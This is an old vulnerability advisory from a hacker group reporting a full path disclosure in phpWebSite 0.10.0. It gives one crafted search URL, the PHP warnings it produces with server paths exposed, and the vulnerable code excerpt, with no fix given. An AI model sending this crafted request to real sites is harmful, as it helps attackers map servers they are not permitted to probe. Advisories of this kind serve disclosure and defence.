phpWebSite 0.10.0 Full Path disclosure
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® [ [ wWw.SoSvulnerable.NeT ] ]®
--------------------------------------------------------
Program: phpWebSite 0.10.0
Homepage: http://phpwebsite.appstate.edu
Vulnerable Versions: All
Risk: High!!
Impact: Full Path disclosure
-==phpWebSite 0.10.0 Full Path disclosure==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpWebSite provides a complete web site content management
system. Web-based administration allows for easy maintenance
of interactive, community-driven web sites.
A remote attacker may exploit this condition to view full path
This vulnerability is reported to affect phpWebSite versions
up to an including version 0.10.0.
- Tested
---------------------------------------------------------
LocalHost!! and other phpWebSites
- Explotation
---------------------------------------------------------
index.php?module=search&SEA_search_op=search&SEA_search_module=[NST & SVL]
it'll come out something like:
Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51
Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51
Warning: search(): Failed opening
'/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php' for inclusion
(include_path='.:/home/grgfidcd/public_html/ccToronto/lib/pear/') in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51
-----[ Start Vuln Code ] ------------------------------------
function search() {
if(!isset($_REQUEST['mod']) || !is_string($_REQUEST['mod'])) {
$module = "all";
} else {
$module = $_REQUEST['mod'];
}
$this->lists = array();
if(isset($_REQUEST['query'])) {
$this->query = preg_replace("/[^\.A-Za-z0-9_-\s]/", "",
$_REQUEST['query']);
} else {
return $this->results();
}
-----[ Ends Vulns Code ] ------------------------------------
- Exploit
---------------------------------------------------------
Not Yet xD
- Solutions
--------------------------------------------------------
Not Yet
- References
--------------------------------------------------------
http://neossecurity.net/Advisories/Advisory-05.txt
- Credits
-------------------------------------------------
Discovered by HaCkZaTaN and LINUX <hck_zatan@xxxxxxxxxxx> -
<svsecurity@xxxxxxxxx>
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
[ [ wWw.SoSvulnerable.NeT ] ]® - http://sosvulnerable.net/
Got Questions? http://sosvulnerable.net - http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Irc.GigaChat.net #swc
- Greets
--------------------------------------------------------
Paisterist
T0wn3r
LINUX
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
Infektion group
And my Colombian people
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/